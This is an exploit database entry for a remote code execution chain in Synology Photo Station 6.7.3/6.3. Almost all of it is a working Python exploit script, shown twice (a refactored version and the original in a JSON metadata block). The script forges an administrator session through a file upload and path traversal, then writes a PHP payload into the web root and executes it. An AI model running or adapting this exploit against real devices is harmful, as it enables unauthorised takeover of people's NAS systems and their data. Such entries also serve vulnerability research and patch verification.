Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution
2017-08-08T00:00:00
ID EXPLOITPACK:8C57BF0FAD578B64C92F2B7AA9822BD1 Type exploitpack Reporter Kacper Szurek Modified 2017-08-08T00:00:00
Description
Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution
'''
Source: https://blogs.securiteam.com/index.php/archives/3356
Vulnerability details
The remote code execution is a combination of 4 different vulnerabilities:
Upload arbitrary files to the specified directories
Log in with a fake authentication mechanism
Log in to Photo Station with any identity
Execute arbitrary code by authenticated user with administrator privileges
The chain of vulnerabilities ultimately lets you execute code as the unprivileged PhotoStation service account (not root):
uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)
'''
import base64

import requests
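# What server you want to attack (scheme + host[:port], no trailing slash).
synology_ip = 'http://192.168.1.100'

# Your current IP. It is written into the forged session as
# "security_identifier"; presumably Photo Station compares it with the address
# the request arrives from, so it must be the address the target actually sees
# (not a NATed/internal one) -- confirm against the advisory.
ip = '192.168.1.200'

# PHP code you want to execute. It runs as the PhotoStation service account
# (see the uid/gid in the module docstring), not as root.
php_to_execute = '<?php echo system("id"); ?>'

# Where the file planted in step 1 ends up, expressed as a path-traversal
# value for file_upload.php's `session` parameter. Depends on the version --
# if the login step returns no cookies, try the alternative below.
session_file_path = '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'
# session_file_path = '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'

# Filesystem location the PHP payload is written to (traverses out of the
# photo share into the package's webroot) and the URL step 5 fetches it from.
payload_fs_path = '/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit'
payload_url_path = '/photo/facebook/exploit.php'

# Seconds to wait per HTTP exchange. Without a timeout `requests` blocks
# forever on a host that accepts the TCP connection but never answers.
REQUEST_TIMEOUT = 15


def php_serialize_str(value):
    """Return *value* as a PHP-serialized string: ``s:<len>:"<value>";``.

    PHP's length prefix counts bytes, not characters, so the length is taken
    from the UTF-8 encoding. The original script hard-coded these counts.
    """
    return f's:{len(value.encode("utf-8"))}:"{value}";'


def build_fake_session(client_ip, admin_user='hlinak3'):
    """Build the forged session blob that step 1 plants on disk.

    The layout ``<owner>|<PHP-serialized array>`` resembles a PHP session
    record for user ``root`` holding two keys: ``security_identifier`` (bound
    to *client_ip*) and ``admin_syno_user``. The original exploit used the
    arbitrary value ``hlinak3`` for the latter; whether the name itself is
    validated anywhere is not established by this script.
    """
    fields = (
        php_serialize_str('security_identifier')
        + php_serialize_str(client_ip)
        + php_serialize_str('admin_syno_user')
        + php_serialize_str(admin_user)
    )
    return 'root|a:2:{' + fields + '}'


def b64_text(text):
    """Base64-encode *text* (UTF-8) and return it as an ASCII str.

    Python 2's ``str.encode('base64')`` appended a newline; PHP's non-strict
    ``base64_decode`` ignores whitespace, so omitting it does not change what
    the server decodes.
    """
    return base64.b64encode(text.encode('utf-8')).decode('ascii')


def plant_fake_session(base_url, client_ip, timeout=REQUEST_TIMEOUT):
    """Step 1 -- write the forged session to disk via the theme-logo upload.

    The request carries no cookies, i.e. the endpoint is reached without any
    session; the uploaded file apparently lands under a fixed name, which is
    what lets step 2 locate it (see ``session_file_path``).
    Returns the ``requests.Response``.
    """
    files = [('file', ('foo.jpg', build_fake_session(client_ip)))]
    return requests.post(
        f'{base_url}/photo/include/synotheme_upload.php',
        data={'action': 'logo_upload'},
        files=files,
        timeout=timeout,
    )


def login_with_fake_session(base_url, session_path, timeout=REQUEST_TIMEOUT):
    """Step 2 -- point file_upload.php's ``session`` query parameter at the
    planted file via path traversal and return the cookies it hands back.

    An empty cookie jar most likely means the file is not at *session_path*
    on this version; try the alternative location listed above.
    """
    resp = requests.post(
        f'{base_url}/photo/include/file_upload.php',
        params={'session': session_path},
        timeout=timeout,
    )
    return resp.cookies


def check_admin(base_url, cookies, timeout=REQUEST_TIMEOUT):
    """Step 3 -- call ``get_setting`` under ``/photo/admin/`` with the obtained
    cookies; a normal settings response indicates they are accepted as an
    administrator session. Returns the ``requests.Response``.
    """
    return requests.post(
        f'{base_url}/photo/admin/general_setting.php',
        data={'action': 'get_setting'},
        cookies=cookies,
        timeout=timeout,
    )


def upload_php(base_url, cookies, php_code, fs_path, timeout=REQUEST_TIMEOUT):
    """Step 4 -- make PixlrEditorHandler.php ``save`` *php_code* to *fs_path*.

    ``image`` is a ``data://`` URI carrying the payload instead of a picture,
    ``path`` traverses out of the photo share into the package webroot, and
    ``type`` appears to supply the extension (step 5 fetches ``.php``).
    Returns the ``requests.Response``.
    """
    form = {
        'action': 'save',
        'image': 'data://text/plain;base64,' + b64_text(php_code),
        'path': b64_text(fs_path),
        'type': 'php',
    }
    return requests.post(
        f'{base_url}/photo/PixlrEditorHandler.php',
        data=form,
        cookies=cookies,
        timeout=timeout,
    )


def run_payload(base_url, url_path, timeout=REQUEST_TIMEOUT):
    """Step 5 -- request the dropped file; the response body is the PHP output."""
    return requests.get(f'{base_url}{url_path}', timeout=timeout)


def main():
    """Run the full chain against ``synology_ip`` and print each response.

    Exits with status 1 and a short message on a transport-level failure
    instead of dumping a traceback.
    """
    try:
        print('[+] Set fake admin session')
        print(plant_fake_session(synology_ip, ip).text)

        print('[+] Login as fake admin')
        cookies = login_with_fake_session(synology_ip, session_file_path)
        print(check_admin(synology_ip, cookies).text)

        print('[+] Upload php file')
        print(upload_php(synology_ip, cookies, php_to_execute, payload_fs_path).text)

        print('[+] Execute payload')
        print(run_payload(synology_ip, payload_url_path).text)
    except requests.RequestException as exc:
        raise SystemExit(f'[-] request failed: {exc}')
    # NOTE: nothing here removes the planted logo/session file or the dropped
    # exploit.php -- clean both up after an authorised test.


if __name__ == '__main__':
    main()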
{"lastseen": "2020-04-01T19:04:50", "references": [], "description": "\nSynology Photo Station 6.7.3-3432 6.3-2967 - Remote Code Execution", "edition": 1, "reporter": "Kacper Szurek", "exploitpack": {"type": "webapps", "platform": "hardware"}, "published": "2017-08-08T00:00:00", "title": "Synology Photo Station 6.7.3-3432 6.3-2967 - Remote Code Execution", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:50", "rev": 2}, "score": {"value": -0.4, "vector": "NONE", "modified": "2020-04-01T19:04:50", "rev": 2}, "vulnersScore": -0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-08-08T00:00:00", "id": "EXPLOITPACK:8C57BF0FAD578B64C92F2B7AA9822BD1", "href": "", "viewCount": 1, "sourceData": "'''\nSource: https://blogs.securiteam.com/index.php/archives/3356\n\nVulnerability details\nThe remote code execution is a combination of 4 different vulnerabilities:\n\nUpload arbitrary files to the specified directories\nLog in with a fake authentication mechanism\nLog in to Photo Station with any identity\nExecute arbitrary code by authenticated user with administrator privileges\nThe chain of vulnerabilities will allow you, in the end, to execute code as:\n\nuid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)\n'''\nimport requests\n\n# What server you want to attack\nsynology_ip = 'http://192.168.1.100'\n\n# Your current IP\nip = '192.168.1.200'\n\n# PHP code you want to execute\nphp_to_execute = '<?php echo system(\"id\"); ?>'\n\nencoded_session = 'root|a:2:{s:19:\"security_identifier\";s:'+str(len(ip))+':\"'+ip+'\";s:15:\"admin_syno_user\";s:7:\"hlinak3\";}'\n\nprint \"[+] Set fake admin sesssion\"\nfile = [('file', ('foo.jpg', encoded_session))]\n\nr = requests.post('{}/photo/include/synotheme_upload.php'.format(synology_ip), data = {'action':'logo_upload'}, files=file)\nprint r.text\n\nprint \"[+] Login as fake admin\"\n\n# Depends on version it might be stored in different 
dirs\npayload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}\n# payload = {'session': '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}\n\ntry_login = requests.post('{}/photo/include/file_upload.php'.format(synology_ip), params=payload)\n\nwhichact = {'action' : 'get_setting'}\nr = requests.post('{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)\nprint r.text\n\nprint \"[+] Upload php file\"\n\nc = {'action' : 'save', 'image' : 'data://text/plain;base64,'+php_to_execute.encode('base64'), 'path' : '/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit'.encode(\"base64\"), 'type' : 'php'}\nr = requests.post('{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)\nprint r.text\n\n\nprint \"[+] Execute payload\"\nf = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))\n\nprint f.text", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}